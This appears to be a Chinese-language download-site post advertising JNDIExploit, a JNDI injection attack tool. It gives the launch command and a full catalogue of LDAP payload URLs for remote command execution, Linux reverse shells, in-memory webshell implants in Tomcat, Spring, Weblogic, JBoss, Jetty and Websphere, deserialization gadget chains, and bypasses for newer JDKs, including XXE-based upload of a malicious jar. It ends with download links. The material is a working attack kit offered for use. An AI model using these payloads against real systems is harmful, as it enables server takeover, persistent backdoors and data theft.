简介
JNDIExploit一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,集成了JDNI注入格式,能够更加方便的开启服务端后直接利用,支持反弹Shell、命令执行、直接植入内存shell等,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。
详细使用文档:JNDIExploit/README.md
相关截图
![图片[1] - 【JNDI注入利用工具】JNDIExploit v1.1 - 极核GetShell](https://get-shell.com/wp-content/uploads/2024/07/image-2.png)
快速使用
服务端
建议使用JDK8开启此服务,否则可能出现利用LDAP时服务端报错。
快速开启JNDIExploit服务端,默认开启LDAP服务1389端口与HTTP服务3456端口,绑定<出口IP>
java -jar JNDIExploit-1.3-SNAPSHOT.jar  -i <你的出口IP>客户端(注入端)
服务端输入命令java -jar JNDIExploit-1.3-SNAPSHOT.jar -u查看支持的JNDI注入格式,或者查看以下列表
Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server
[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
    ldap://127.0.0.1:1389/Basic/Command/[cmd]
    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Basic/TomcatEcho
    ldap://127.0.0.1:1389/Basic/SpringEcho
    ldap://127.0.0.1:1389/Basic/WeblogicEcho
    ldap://127.0.0.1:1389/Basic/TomcatMemshell1
    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/Basic/JettyMemshell
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
    ldap://127.0.0.1:1389/Basic/JBossMemshell
    ldap://127.0.0.1:1389/Basic/WebsphereMemshell
    ldap://127.0.0.1:1389/Basic/SpringMemshell
[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells
[+] TomcatBypass Queries
    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell
[+] GroovyBypass Queries
    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]
[+] WebsphereBypass Queries
    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp- 目前支持的所有 PayloadType为- Dnslog: 用于产生一个- DNS请求,与- DNSLog平台配合使用,对- Linux/Windows进行了简单的适配
- Command: 用于执行命令,如果命令有特殊字符,支持对命令进行- Base64编码后传输
- ReverseShell: 用于- Linux系统的反弹shell,方便使用
- TomcatEcho: 用于在中间件为- Tomcat时命令执行结果的回显,通过添加自定义- header- cmd: whoami的方式传递想要执行的命令
- SpringEcho: 用于在框架为- SpringMVC/SpringBoot时命令执行结果的回显,通过添加自定义- header- cmd: whoami的方式传递想要执行的命令
- WeblogicEcho: 用于在中间件为- Weblogic时命令执行结果的回显,通过添加自定义- header- cmd: whoami的方式传递想要执行的命令
- TomcatMemshell1: 用于植入- Tomcat内存shell, 支持- Behinder shell与- Basic cmd shell
- TomcatMemshell2: 用于植入- Tomcat内存shell, 支持- Behinder shell与- Basic cmd shell, 使用时需要添加额外的- HTTP Header- Shell: true, 推荐使用此方式
- SpringMemshell: 用于植入- Spring内存shell, 支持- Behinder shell与- Basic cmd shell
- WeblogicMemshell1: 用于植入- Weblogic内存shell, 支持- Behinder shell与- Basic cmd shell
- WeblogicMemshell2: 用于植入- Weblogic内存shell, 支持- Behinder shell与- Basic cmd shell,推荐使用此方式
- JettyMemshell: 用于植入- Jetty内存shell, 支持- Behinder shell与- Basic cmd shell
- JBossMemshell: 用于植入- JBoss内存shell, 支持- Behinder shell与- Basic cmd shell
- WebsphereMemshell: 用于植入- Websphere内存shell, 支持- Behinder shell与- Basic cmd shell
 
- 目前支持的所有 GadgetType为- URLDNS
- CommonsBeanutils1
- CommonsBeanutils2
- CommonsCollectionsK1
- CommonsCollectionsK2
- C3P0
- Jdk7u21
- Jre8u20
- CVE_2020_2551
- CVE_2020_2883
 
- WebsphereBypass中的 3 个动作:- list:基于- XXE查看目标服务器上的目录或文件内容
- upload:基于- XXE的- jar协议将恶意- jar包上传至目标服务器的临时目录
 
下载
极核始终提供一条免费的直链下载通道!
为防止恶意爬取下载,请登录并回复后下载!
为防止恶意爬取下载,请登录并回复后下载!
✈️ 全球下载通道
🚀 极核加速通道
THE END
    
















- 最新
- 最热
只看作者